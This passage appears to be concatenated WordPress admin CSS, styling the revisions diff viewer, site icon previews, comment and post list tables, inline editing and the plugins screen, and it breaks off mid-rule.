.wp-slider{max-width:70%;margin:0 auto;top:-3px}.revisions-diff{padding:15px;background-color:#fff;box-shadow:0 1px 3px rgba(0,0,0,.1)}.revisions-diff h3:first-child{margin-top:0}#revisions-meta-restored img,.post-revisions li img{vertical-align:middle}table.diff{table-layout:fixed;width:100%;white-space:pre-wrap}table.diff col.content{width:auto}table.diff col.content.diffsplit{width:48%}table.diff col.diffsplit.middle{width:auto}table.diff col.ltype{width:30px}table.diff tr{background-color:transparent}table.diff td,table.diff th{font-family:Consolas,Monaco,monospace;font-size:14px;line-height:1.57142857;padding:.5em .5em .5em 2em;vertical-align:top;word-wrap:break-word}table.diff td h1,table.diff td h2,table.diff td h3,table.diff td h4,table.diff td h5,table.diff td h6{margin:0}table.diff .diff-addedline ins,table.diff .diff-deletedline del{text-decoration:none}table.diff .diff-deletedline{position:relative;background-color:#fcf0f1}table.diff .diff-deletedline del{background-color:#ffabaf}table.diff .diff-addedline{position:relative;background-color:#edfaef}table.diff .diff-addedline .dashicons,table.diff .diff-deletedline .dashicons{position:absolute;top:.85714286em;left:.5em;width:1em;height:1em;font-size:1em;line-height:1}table.diff .diff-addedline .dashicons{top:.92857143em}table.diff .diff-addedline ins{background-color:#68de7c}.diff-meta{padding:5px;clear:both;min-height:32px}.diff-title strong{line-height:2.46153846;min-width:60px;text-align:right;float:left;margin-right:5px}.revisions-controls .author-card .author-info{font-size:12px;line-height:1.33333333}.revisions-controls .author-card .author-info,.revisions-controls .author-card .avatar{float:left;margin-left:6px;margin-right:6px}.revisions-controls .author-card .byline{display:block;font-size:12px}.revisions-controls .author-card .avatar{vertical-align:middle}.diff-meta input.restore-revision{float:right;margin-left:6px;margin-right:6px}.diff-meta-from{display:none}.comparing-two-revisions .diff-meta-from{display:block}.revisions-tooltip{position:absolute;bottom:105px;margin-right:0;margin-left:-69px;z-index:0;max-width:350px;min-width:130px;padding:8px 4px;display:none;opacity:0}.revisions-tooltip.flipped{margin-left:0;margin-right:-70px}.revisions.pinned .revisions-tooltip{display:none!important}.comparing-two-revisions .revisions-tooltip{bottom:145px}.revisions-tooltip-arrow{width:70px;height:15px;overflow:hidden;position:absolute;left:0;margin-left:35px;bottom:-15px}.revisions-tooltip.flipped .revisions-tooltip-arrow{margin-left:0;margin-right:35px;left:auto;right:0}.revisions-tooltip-arrow>span{content:"";position:absolute;left:20px;top:-20px;width:25px;height:25px;transform:rotate(45deg)}.revisions-tooltip.flipped .revisions-tooltip-arrow>span{left:auto;right:20px}.revisions-tooltip,.revisions-tooltip-arrow>span{border:1px solid #dcdcde;background-color:#fff}.revisions-tooltip{display:none}.arrow{width:70px;height:16px;overflow:hidden;position:absolute;left:0;margin-left:-35px;bottom:90px;z-index:10000}.arrow:after{z-index:9999;background-color:#fff;box-shadow:0 1px 3px rgba(0,0,0,.1)}.arrow.top{top:-16px;bottom:auto}.arrow.left{left:20%}.arrow:after{content:"";position:absolute;left:20px;top:-20px;width:25px;height:25px;transform:rotate(45deg)}.revisions-tooltip,.revisions-tooltip-arrow:after{border-width:1px;border-style:solid}div.revisions-controls>.wp-slider>.ui-slider-handle{margin-left:-10px}.rtl div.revisions-controls>.wp-slider>.ui-slider-handle{margin-right:-10px}.wp-slider.ui-slider{position:relative;border:1px solid #dcdcde;text-align:left;cursor:pointer}.wp-slider .ui-slider-handle{border-radius:50%;height:18px;margin-top:-5px;outline:0;padding:2px;position:absolute;width:18px;z-index:2;touch-action:none}.wp-slider .ui-slider-handle{background:#f6f7f7;border:1px solid #c3c4c7;box-shadow:0 1px 0 #c3c4c7}.wp-slider .ui-slider-handle.ui-state-hover,.wp-slider .ui-slider-handle:hover{background:#f6f7f7;border-color:#8c8f94}.wp-slider .ui-slider-handle.ui-state-active,.wp-slider .ui-slider-handle:active{background:#f0f0f1;border-color:#8c8f94;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5);transform:translateY(1px)}.wp-slider .ui-slider-handle.ui-state-focus,.wp-slider .ui-slider-handle:focus{background:#f0f0f1;border-color:#8c8f94;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.wp-slider .ui-slider-handle:before{background:0 0;position:absolute;top:2px;left:2px;color:#50575e;content:"\f229";content:"\f229"/'';font:normal 18px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-slider .ui-slider-handle.ui-state-hover:before,.wp-slider .ui-slider-handle:hover:before{color:#1d2327}.wp-slider .ui-slider-handle.from-handle:before,.wp-slider .ui-slider-handle.to-handle:before{font-size:20px!important;margin:-1px 0 0 -1px}.wp-slider .ui-slider-handle.from-handle:before{content:"\f139";content:"\f139"/''}.wp-slider .ui-slider-handle.to-handle:before{content:"\f141";content:"\f141"/''}.rtl .wp-slider .ui-slider-handle.from-handle:before{content:"\f141";content:"\f141"/''}.rtl .wp-slider .ui-slider-handle.to-handle:before{content:"\f139";content:"\f139"/'';right:-1px}.wp-slider .ui-slider-range{position:absolute;font-size:.7em;display:block;border:0;background-color:transparent;background-image:none}.wp-slider.ui-slider-horizontal{height:.7em}.wp-slider.ui-slider-horizontal .ui-slider-handle{top:-.25em;margin-left:-.6em}.wp-slider.ui-slider-horizontal .ui-slider-range{top:0;height:100%}.wp-slider.ui-slider-horizontal .ui-slider-range-min{left:0}.wp-slider.ui-slider-horizontal .ui-slider-range-max{right:0}@media print,(min-resolution:120dpi){.revision-tick.completed-false{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:600px){.revisions-meta .author-card:not(.comparing-two-revisions .author-card){display:flex;flex-direction:column;width:fit-content;gap:16px}.comparing-two-revisions .revisions-meta .restore-revision{margin-top:16px}.revisions-controls{padding-top:0}.revision-toggle-compare-mode{position:relative;padding:1rem 0}}@media screen and (max-width:782px){#diff-next-revision,#diff-previous-revision{margin-top:-1em}.revisions-buttons{overflow:hidden;margin-bottom:15px}.comparing-two-revisions .revisions-controls,.revisions-controls{height:fit-content}.revisions-tooltip{bottom:155px;z-index:2}.comparing-two-revisions .revisions-tooltip{bottom:200px}.diff-meta{overflow:hidden}table.diff{-ms-word-break:break-all;word-break:break-all;word-wrap:break-word}}/*! This file is auto-generated */ .site-icon-section{--site-icon-removal:#b32d2e}.site-icon-preview{--site-icon-input-border:#8c8f94;--site-icon-preview-background:#fff;--site-icon-preview-browser-top:#dcdcde;--site-icon-preview-browser-bottom:#a7aaad;--site-icon-preview-browser-border:rgba(255, 255, 255, 0.2);--site-icon-address-bar-background:#f0f0f1;--site-icon-address-bar-close:#646970;--site-icon-address-bar-text:#3c434a;--site-icon-shadow-1:rgba(0, 0, 0, 0.1);--site-icon-shadow-2:rgba(0, 0, 0, 0.2);--site-icon-shadow-3:rgba(0, 0, 0, 0.5);direction:initial;display:flex;height:60px;padding:8px 0 0 8px;align-items:flex-start;position:relative;overflow:hidden;box-sizing:border-box;border:1px solid var(--site-icon-input-border);border-radius:4px;background-color:var(--site-icon-preview-background);width:275px}@media (prefers-color-scheme:dark){.site-icon-preview{--site-icon-preview-browser-top:#2c3338;--site-icon-preview-browser-bottom:#111;--site-icon-address-bar-background:#3c434a;--site-icon-address-bar-close:#f0f0f1;--site-icon-address-bar-text:#f0f0f1}}.site-icon-preview.settings{height:88px;padding:16px 0 0 16px;width:350px;margin:0 0 16px 0}.site-icon-preview.crop{width:258px;height:100%;display:grid;grid-template-columns:8px 1fr;grid-template-rows:64px 1fr;padding-left:0;row-gap:16px;direction:inherit}.site-icon-preview.hidden{display:none}.site-icon-preview .direction-wrap{grid-template-columns:44px 1fr;gap:8px;display:grid;direction:ltr;height:100%;width:100%}.site-icon-preview.settings .direction-wrap{grid-template-columns:58px 1fr;gap:16px}.site-icon-preview:after{--after-size:150%;aspect-ratio:1/1;content:"";display:block;position:absolute;top:0;left:0;width:var(--after-size);transform:translate(calc(var(--after-size) * -.125),calc(var(--after-size) * -.125));filter:blur(5px);opacity:.5;background:var(--site-icon-url)}.site-icon-preview .app-icon-preview{aspect-ratio:1/1;border-radius:10px;box-shadow:0 1px 5px 0 var(--site-icon-shadow-3);flex-shrink:0;width:100%;z-index:1}.site-icon-preview-browser{display:flex;padding:4px 4px 0 12px;align-items:flex-start;gap:16px;flex:1 0 0;z-index:1;border-top-left-radius:10px;border-top:1px solid var(--site-icon-preview-browser-border);border-left:1px solid var(--site-icon-preview-browser-border);background:linear-gradient(180deg,var(--site-icon-preview-browser-top) 0,var(--site-icon-preview-browser-bottom) 100%);box-shadow:0 10px 22px 0 var(--site-icon-shadow-2)}.site-icon-preview .browser-buttons{width:48px;height:40px;fill:var(--site-icon-input-border)}.site-icon-preview-tab{padding:8px;align-items:center;gap:8px;flex:1 0 0;border-radius:4px;background-color:var(--site-icon-address-bar-background);box-shadow:0 1px 3px 0 var(--site-icon-shadow-1);display:grid;grid-template-columns:24px auto 24px}.site-icon-preview-browser .browser-icon-preview{box-shadow:0 0 20px 0 var(--site-icon-shadow-1)}.site-icon-preview-tab>img,.site-icon-preview-tab>svg{width:24px;height:24px}.site-icon-preview-tab>svg{fill:var(--site-icon-address-bar-close)}.site-icon-preview-site-title{color:var(--site-icon-address-bar-text);text-overflow:ellipsis;white-space:nowrap;overflow:hidden;font-weight:500}.site-icon-preview-crop-modal .image-preview-wrap.app-icon-preview{width:64px;height:64px;margin:0;grid-column:2}.site-icon-preview-crop-modal .site-icon-preview-browser{grid-column:2}.site-icon-preview-crop-modal .image-preview-wrap{overflow:hidden;aspect-ratio:1/1}.site-icon-preview-crop-modal .image-preview-wrap.browser{width:24px;height:24px}button.reset.remove-site-icon{color:var(--site-icon-removal);text-decoration:none;border-color:currentColor;box-shadow:none;background:0 0}button.reset.remove-site-icon:focus,button.reset.remove-site-icon:hover{background:var(--site-icon-removal);color:#fff;border-color:var(--site-icon-removal);box-shadow:0 0 0 1px var(--site-icon-removal)}.site-icon-action-buttons{display:flex;flex-wrap:wrap;gap:10px}/*! This file is auto-generated */ .response-links { display: block; margin-bottom: 1em; } .response-links a { display: block; } .response-links a.comments-edit-item-link { font-weight: 600; } .response-links a.comments-view-item-link { font-size: 12px; } .post-com-count-wrapper strong { font-weight: 400; } .comments-view-item-link { display: inline-block; clear: both; } .column-response .post-com-count-wrapper, .column-comments .post-com-count-wrapper { white-space: nowrap; word-wrap: normal; } /* comments bubble common */ .column-response .post-com-count, .column-comments .post-com-count { display: inline-block; vertical-align: top; } /* comments bubble approved */ .column-response .post-com-count-no-comments, .column-response .post-com-count-approved, .column-comments .post-com-count-no-comments, .column-comments .post-com-count-approved { margin-top: 5px; } .column-response .comment-count-no-comments, .column-response .comment-count-approved, .column-comments .comment-count-no-comments, .column-comments .comment-count-approved { box-sizing: border-box; display: block; padding: 0 8px; min-width: 24px; height: 2em; border-radius: 5px; background-color: #646970; color: #fff; font-size: 11px; line-height: 1.90909090; text-align: center; } .column-response .post-com-count-no-comments:after, .column-response .post-com-count-approved:after, .column-comments .post-com-count-no-comments:after, .column-comments .post-com-count-approved:after { content: ""; display: block; margin-right: 8px; width: 0; height: 0; border-top: 5px solid #646970; border-left: 5px solid transparent; } .column-response a.post-com-count-approved:hover .comment-count-approved, .column-response a.post-com-count-approved:focus .comment-count-approved, .column-comments a.post-com-count-approved:hover .comment-count-approved, .column-comments a.post-com-count-approved:focus .comment-count-approved { background: #3858e9; } .column-response a.post-com-count-approved:hover:after, .column-response a.post-com-count-approved:focus:after, .column-comments a.post-com-count-approved:hover:after, .column-comments a.post-com-count-approved:focus:after { border-top-color: #3858e9; } /* @todo: consider to use a single rule for these counters and the admin menu counters. */ .column-response .post-com-count-pending, .column-comments .post-com-count-pending { position: relative; right: -3px; padding: 0 5px; min-width: 7px; height: 17px; border: 2px solid #fff; border-radius: 11px; background: #d63638; color: #fff; font-size: 9px; line-height: 1.88888888; text-align: center; } .column-response .post-com-count-no-pending, .column-comments .post-com-count-no-pending { display: none; } /* comments */ .commentlist li { padding: 1em 1em .2em; margin: 0; border-bottom: 1px solid #c3c4c7; } .commentlist li li { border-bottom: 0; padding: 0; } .commentlist p { padding: 0; margin: 0 0 .8em; } #submitted-on, .submitted-on { color: #50575e; } /* reply to comments */ #replyrow td { padding: 2px; } #replysubmit { margin: 0; padding: 5px 7px 10px; overflow: hidden; } #replysubmit .reply-submit-buttons { margin-bottom: 0; } #replysubmit .button { margin-left: 5px; } #replysubmit .spinner { float: none; margin: -4px 0 0; } #replyrow.inline-edit-row fieldset.comment-reply { font-size: inherit; line-height: inherit; } #replyrow legend { margin: 0; padding: .2em 5px 0; font-size: 13px; line-height: 1.4; font-weight: 600; } #replyrow.inline-edit-row label { display: inline; vertical-align: baseline; line-height: inherit; } #edithead .inside, #commentsdiv #edithead .inside { float: right; padding: 3px 5px 2px 0; margin: 0; text-align: center; } #edithead .inside input { width: 180px; } #edithead label { padding: 2px 0; } #replycontainer { padding: 5px; } #replycontent { height: 120px; box-shadow: none; } #replyerror { border-color: #dcdcde; background-color: #f6f7f7; } /* @todo: is this used? */ .commentlist .avatar { vertical-align: text-top; } #the-comment-list tr.undo, #the-comment-list div.undo { background-color: #f6f7f7; } #the-comment-list .unapproved th, #the-comment-list .unapproved td { background-color: #fcf9e8; } #the-comment-list .unapproved th.check-column { border-right: 4px solid #d63638; } #the-comment-list .unapproved th.check-column input { margin-right: 4px; } #the-comment-list .approve a { color: #007017; } #the-comment-list .unapprove a { color: #996800; } #the-comment-list th, #the-comment-list td { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } #the-comment-list tr:last-child th, #the-comment-list tr:last-child td { box-shadow: none; } #the-comment-list tr.unapproved + tr.approved th, #the-comment-list tr.unapproved + tr.approved td { border-top: 1px solid rgba(0, 0, 0, 0.03); } /* table vim shortcuts */ .vim-current, .vim-current th, .vim-current td { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08) !important; } th .comment-grey-bubble { width: 16px; /* Make sure the link clickable area fills the entire table header. */ position: relative; top: 2px; } th .comment-grey-bubble:before { content: "\f101"; content: "\f101" / ''; font: normal 20px/.5 dashicons; display: inline-block; padding: 0; top: 4px; right: -4px; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #3c434a; } /*------------------------------------------------------------------------------ 10.0 - List Posts (/Pages/etc) ------------------------------------------------------------------------------*/ table.fixed { table-layout: fixed; } .fixed .column-rating, .fixed .column-visible { width: 8%; } .fixed .column-posts, .fixed .column-parent, .fixed .column-links, .fixed .column-author, .fixed .column-format { width: 10%; } .fixed .column-date { width: 14%; } .column-date span[title] { -webkit-text-decoration: dotted underline; text-decoration: dotted underline; } .fixed .column-posts { width: 74px; } .fixed .column-role, .fixed .column-posts { hyphens: auto; } .fixed .column-comment .comment-author { display: none; } .fixed .column-response, .fixed .column-categories, .fixed .column-tags, .fixed .column-rel, .fixed .column-role { width: 15%; } .fixed .column-slug { width: 25%; } .fixed .column-locations { width: 35%; } .fixed .column-comments { width: 5.5em; text-align: right; } .fixed .column-comments .vers { padding-right: 3px; } td.column-title strong, td.plugin-title strong { display: block; margin-bottom: .2em; font-size: 14px; } td.column-title p, td.plugin-title p { margin: 6px 0; } /* Media file column */ table.media .column-title .media-icon { float: right; min-height: 60px; margin: 0 0 0 9px; } table.media .column-title .media-icon img { max-width: 60px; height: auto; vertical-align: top; /* Remove descender white-space. */ } table.media .column-title .has-media-icon ~ .row-actions { margin-right: 70px; /* 60px image + margin */ } table.media .column-title .filename { margin-bottom: 0.2em; } /* Media Copy to clipboard row action */ .media .row-actions .copy-to-clipboard-container { display: inline; position: relative; } .media .row-actions .copy-to-clipboard-container .success { position: absolute; right: 50%; transform: translate(50%, -100%); background: #000; color: #fff; border-radius: 5px; margin: 0; padding: 2px 5px; } /* @todo: pick a consistent list table selector */ .wp-list-table a { transition: none; } #the-list tr:last-child td, #the-list tr:last-child th { border-bottom: none !important; box-shadow: none; } #comments-form .fixed .column-author { width: 20%; } #commentsdiv.postbox .inside { margin: 0; padding: 0; } #commentsdiv .inside .row-actions { line-height: 1.38461538; } #commentsdiv .inside .column-author { width: 25%; } #commentsdiv .column-comment p { margin: 0.6em 0; padding: 0; } #commentsdiv #replyrow td { padding: 0; } #commentsdiv p { padding: 8px 10px; margin: 0; } #commentsdiv .comments-box { border: 0 none; } #commentsdiv .comments-box thead th, #commentsdiv .comments-box thead td { background: transparent; padding: 0 7px 4px; } #commentsdiv .comments-box tr:last-child td { border-bottom: 0 none; } #commentsdiv #edithead .inside input { width: 160px; } .sorting-indicators { display: grid; } .sorting-indicator { display: block; width: 10px; height: 4px; margin-top: 4px; margin-right: 7px; } .sorting-indicator:before { font: normal 20px/1 dashicons; display: inline-block; padding: 0; top: -4px; right: -8px; line-height: 0.5; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #a7aaad; } .sorting-indicator.asc:before { content: "\f142"; content: "\f142" / ''; } .sorting-indicator.desc:before { content: "\f140"; content: "\f140" / ''; } th.sorted.desc .sorting-indicator.desc:before { color: #1d2327; } th.sorted.asc .sorting-indicator.asc:before { color: #1d2327; } th.sorted.asc a:focus .sorting-indicator.asc:before, th.sorted.asc:hover .sorting-indicator.asc:before, th.sorted.desc a:focus .sorting-indicator.desc:before, th.sorted.desc:hover .sorting-indicator.desc:before { color: #a7aaad; } th.sorted.asc a:focus .sorting-indicator.desc:before, th.sorted.asc:hover .sorting-indicator.desc:before, th.sorted.desc a:focus .sorting-indicator.asc:before, th.sorted.desc:hover .sorting-indicator.asc:before { color: #1d2327; } .wp-list-table .toggle-row { position: absolute; left: 8px; top: 10px; display: none; padding: 0; width: 40px; height: 40px; border: none; outline: none; background: transparent; } .wp-list-table .toggle-row:hover { cursor: pointer; } .wp-list-table .toggle-row:focus:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-list-table .toggle-row:active { box-shadow: none; } .wp-list-table .toggle-row:before { position: absolute; top: -5px; right: 10px; border-radius: 50%; display: block; padding: 1px 0 1px 2px; color: #3c434a; /* same as table headers sort arrows */ content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-list-table .is-expanded .toggle-row:before { content: "\f142"; content: "\f142" / ''; } .check-column { position: relative; } .check-column label { box-sizing: border-box; width: 100%; height: 100%; display: block; position: absolute; top: 0; right: 0; } .check-column input { position: relative; z-index: 1; } .check-column .label-covers-full-cell:hover + input:not(:disabled) { box-shadow: 0 0 0 1px #2271b1; } .check-column label:hover, .check-column input:hover + label { background: rgba(0, 0, 0, 0.05); } .locked-indicator { display: none; margin-right: 6px; height: 20px; width: 16px; } .locked-indicator-icon:before { color: #8c8f94; content: "\f160"; content: "\f160" / ''; display: inline-block; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .locked-info { display: none; margin-top: 4px; } .locked-text { vertical-align: top; } .wp-locked .locked-indicator, .wp-locked .locked-info { display: block; } tr.wp-locked .check-column label, tr.wp-locked .check-column input[type="checkbox"], tr.wp-locked .row-actions .inline, tr.wp-locked .row-actions .trash { display: none; } #menu-locations-wrap .widefat { width: 60%; } .widefat th.sortable, .widefat th.sorted { padding: 0; } th.sortable a, th.sorted a { display: block; overflow: hidden; padding: 8px; } th.sortable a:focus, th.sorted a:focus { border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } th.sortable a span, th.sorted a span { float: right; cursor: pointer; } .tablenav-pages .current-page { vertical-align: top; margin: 0 0 0 2px; font-size: 13px; text-align: center; min-height: 32px; padding: 0 8px; } .tablenav .total-pages { margin-left: 2px; } .tablenav #table-paging { margin-right: 2px; } .tablenav { clear: both; height: 32px; margin: 6px 0 4px; vertical-align: middle; } .tablenav.themes { max-width: 98%; } .tablenav .tablenav-pages { float: left; margin: 0 0 9px; } .tablenav .no-pages, .tablenav .one-page .pagination-links { display: none; } .tablenav .tablenav-pages .button, .tablenav .tablenav-pages .tablenav-pages-navspan { display: inline-block; vertical-align: baseline; min-width: 32px; min-height: 32px; margin: 0; padding: 0 4px; font-size: 16px; line-height: 1.875; /* 30px for 32px height */ text-align: center; } .tablenav .displaying-num { margin-left: 7px; } .tablenav .one-page .displaying-num { display: inline-block; margin: 5px 0; } .tablenav .actions { padding: 0 0 0 8px; } .wp-filter .actions { display: inline-block; vertical-align: middle; } .tablenav .delete { margin-left: 20px; } /* This view-switcher is still used on multisite. */ .tablenav .view-switch { float: left; margin: 0 5px; padding-top: 3px; } .wp-filter .view-switch { display: inline-block; vertical-align: middle; padding: 12px 0; margin: 0 2px 0 8px; } .media-toolbar.wp-filter .view-switch { margin: 0 2px 0 12px; } .view-switch a { float: right; width: 28px; height: 28px; text-align: center; line-height: 1.84615384; text-decoration: none; } .view-switch a:before { color: #c3c4c7; display: inline-block; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .view-switch a:hover:before, .view-switch a:focus:before { color: #787c82; } .view-switch a.current:before { color: #2271b1; } .view-switch .view-list:before { content: "\f163"; content: "\f163" / ''; } .view-switch .view-excerpt:before { content: "\f164"; content: "\f164" / ''; } .view-switch .view-grid:before { content: "\f509"; content: "\f509" / ''; } .filter { float: right; margin: -5px 10px 0 0; } .filter .subsubsub { margin-right: -10px; margin-top: 13px; } .screen-per-page { width: 4em; } #posts-filter .wp-filter { margin-bottom: 0; } #posts-filter fieldset { float: right; margin: 0 0 1em 1.5ex; padding: 0; } #posts-filter fieldset legend { padding: 0 1px .2em 0; } p.pagenav { margin: 0; display: inline; } .pagenav span { font-weight: 600; margin: 0 6px; } .row-title { font-size: 14px !important; font-weight: 600; } .column-comment .comment-author { margin-bottom: 0.6em; } .column-author img, .column-username img, .column-comment .comment-author img { float: right; margin-left: 10px; margin-top: 1px; } .row-actions { color: #646970; font-size: 13px; padding: 2px 0 0; position: relative; right: -9999em; } /* ticket #34150 */ .rtl .row-actions a { display: inline-block; } .row-actions .network_only, .row-actions .network_active { color: #000; } .no-js .row-actions, tr:hover .row-actions, .mobile .row-actions, .row-actions.visible, .comment-item:hover .row-actions { position: static; } /* deprecated */ .row-actions-visible { padding: 2px 0 0; } /*------------------------------------------------------------------------------ 10.1 - Inline Editing ------------------------------------------------------------------------------*/ /* .quick-edit* is for Quick Edit .bulk-edit* is for Bulk Edit .inline-edit* is for everything */ /* Layout */ #wpbody-content .inline-edit-row fieldset { float: right; margin: 0; padding: 0 0 0 12px; width: 100%; box-sizing: border-box; } #wpbody-content .inline-edit-row td fieldset:last-of-type { padding-left: 0; } tr.inline-edit-row td { padding: 0; /* Prevents the focus style on .inline-edit-wrapper from being cut-off */ position: relative; } .inline-edit-wrapper { display: flow-root; padding: 0 12px; border: 1px solid transparent; border-radius: 4px; } .inline-edit-wrapper:focus { border-color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #wpbody-content .quick-edit-row-post .inline-edit-col-left { width: 40%; } #wpbody-content .quick-edit-row-post .inline-edit-col-right { width: 39%; } #wpbody-content .inline-edit-row-post .inline-edit-col-center { width: 20%; } #wpbody-content .quick-edit-row-page .inline-edit-col-left { width: 50%; } #wpbody-content .quick-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row-post .inline-edit-col-right { width: 50%; } #wpbody-content .bulk-edit-row .inline-edit-col-left { width: 30%; } #wpbody-content .bulk-edit-row-page .inline-edit-col-right { width: 69%; } #wpbody-content .bulk-edit-row .inline-edit-col-bottom { float: left; width: 69%; } #wpbody-content .inline-edit-row-page .inline-edit-col-right { margin-top: 27px; } .inline-edit-row fieldset .inline-edit-group { clear: both; line-height: 2.5; } .inline-edit-row .submit { display: flex; flex-wrap: wrap; align-items: center; clear: both; margin: 0; padding: 0.5em 0 1em; } .inline-edit-save.submit .button { margin-left: 8px; } .inline-edit-save .spinner { float: none; margin: 0; } .inline-edit-row .notice-error { box-sizing: border-box; min-width: 100%; margin-top: 1em; } .inline-edit-row .notice-error .error { margin: 0.5em 0; padding: 2px; } /* Positioning */ /* Needs higher specificity for the padding */ #the-list .inline-edit-row .inline-edit-legend { margin: 0; padding: 0.2em 0; line-height: 2.5; font-weight: 600; } .inline-edit-row fieldset span.title, .inline-edit-row fieldset span.checkbox-title { margin: 0; padding: 0; } .inline-edit-row fieldset label, .inline-edit-row fieldset span.inline-edit-categories-label { display: block; margin: .2em 0; line-height: 2.5; } .inline-edit-row fieldset.inline-edit-date label { display: inline-block; margin: 0; vertical-align: baseline; line-height: 2; } .inline-edit-row fieldset label.inline-edit-tags { margin-top: 0; } .inline-edit-row fieldset label.inline-edit-tags span.title { margin: .2em 0; width: auto; } .inline-edit-row fieldset label span.title, .inline-edit-row fieldset.inline-edit-date legend { display: block; float: right; width: 6em; line-height: 2.5; } #posts-filter fieldset.inline-edit-date legend { padding: 0; } .inline-edit-row fieldset label span.input-text-wrap, .inline-edit-row fieldset .timestamp-wrap { display: block; margin-right: 6em; } .quick-edit-row-post fieldset.inline-edit-col-right label span.title { width: auto; padding-left: 0.5em; } .inline-edit-row .inline-edit-or { margin: .2em 0 .2em 6px; line-height: 2.5; } .inline-edit-row .input-text-wrap input[type=text] { width: 100%; } .inline-edit-row fieldset label input[type=checkbox] { vertical-align: middle; } .inline-edit-row fieldset label textarea { width: 100%; height: 4em; vertical-align: top; } .inline-edit-row select, .inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])) { min-height: 32px; padding: 0 8px 0 8px; } .inline-edit-row select { line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding-left: 24px; } #wpbody-content .bulk-edit-row fieldset .inline-edit-group label { max-width: 50%; } #wpbody-content .quick-edit-row fieldset .inline-edit-group label.alignleft:first-child { margin-left: 0.5em } .inline-edit-col-right .input-text-wrap input.inline-edit-menu-order-input { width: 6em; } /* Styling */ .inline-edit-row .inline-edit-legend { text-transform: uppercase; } /* Specific Elements */ .inline-edit-row fieldset .inline-edit-date { float: right; } .inline-edit-row fieldset input[name=jj], .inline-edit-row fieldset input[name=hh], .inline-edit-row fieldset input[name=mn], .inline-edit-row fieldset input[name=aa] { vertical-align: middle; text-align: center; padding: 0 4px; } .inline-edit-row fieldset label input.inline-edit-password-input { width: 8em; } #bulk-titles-list, #bulk-titles-list li, .inline-edit-row fieldset ul.cat-checklist li, .inline-edit-row fieldset ul.cat-checklist input { margin: 0; position: relative; /* RTL fix, #WP27629 */ } .inline-edit-row fieldset ul.cat-checklist input { margin-top: -1px; margin-right: 3px; } .inline-edit-row fieldset label input.inline-edit-menu-order-input { width: 3em; } .inline-edit-row fieldset label input.inline-edit-slug-input { width: 75%; } .inline-edit-row select[name="post_parent"], .inline-edit-row select[name="page_template"] { max-width: 80%; } .quick-edit-row-post fieldset label.inline-edit-status { float: right; } #bulk-titles, ul.cat-checklist { height: 14em; border: 1px solid #ddd; margin: 0 0 5px; padding: 0.2em 5px; overflow-y: scroll; } ul.cat-checklist input[name="post_category[]"]:indeterminate::before { content: ''; border-top: 2px solid grey; width: 65%; height: 2px; position: absolute; top: calc( 50% + 1px ); right: 50%; transform: translate( 50%, -50% ); } #bulk-titles .ntdelbutton, #bulk-titles .ntdeltitle, .inline-edit-row fieldset ul.cat-checklist label { display: inline-block; margin: 0; padding: 3px 0; line-height: 20px; vertical-align: top; } #bulk-titles .ntdelitem { padding-right: 23px; } #bulk-titles .ntdelbutton { width: 26px; height: 26px; margin: 0 -26px 0 0; text-align: center; border-radius: 3px; } #bulk-titles .ntdelbutton:before { display: inline-block; vertical-align: top; } #bulk-titles .ntdelbutton:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; /* Reset inherited offset from Gutenberg */ outline-offset: 0; } /*------------------------------------------------------------------------------ 17.0 - Plugins ------------------------------------------------------------------------------*/ .plugins tbody th.check-column, .plugins tbody { padding: 8px 2px 0 0; } .plugins tbody th.check-column input[type=checkbox] { margin-top: 4px; } .updates-table .plugin-title p { margin-top: 0; } .plugins thead td.check-column, .plugins tfoot td.check-column, .plugins .inactive th.check-column { padding-right: 6px; } .plugins, .plugins th, .plugins td { color: #000; } .plugins tr { background: #fff; } .plugins p { margin: 0 4px; padding: 0; } .plugins .desc p { margin: 0 0 8px; } .plugins td.desc { line-height: 1.5; } .plugins .desc ul, .plugins .desc ol { margin: 0 2em 0 0; } .plugins .desc ul { list-style-type: disc; } .plugins .row-actions { font-size: 13px; padding: 0; } .plugins .inactive td, .plugins .inactive th, .plugins .active td, .plugins .active th { padding: 10px 9px; } .plugins .active td, .plugins .active th { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .plugins .update th, .plugins .update td { border-bottom: 0; } .plugins .inactive td, .plugins .inactive th, .plugins .active td, .plugins .active th, .plugin-install #the-list td, .upgrade .plugins td, .upgrade .plugins th { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugins tr.active.plugin-update-tr + tr.inactive th, .plugins tr.active.plugin-update-tr + tr.inactive td, .plugins tr.active + tr.inactive th, .plugins tr.active + tr.inactive td { border-top: 1px solid rgba(0, 0, 0, 0.03); box-shadow: inset 0 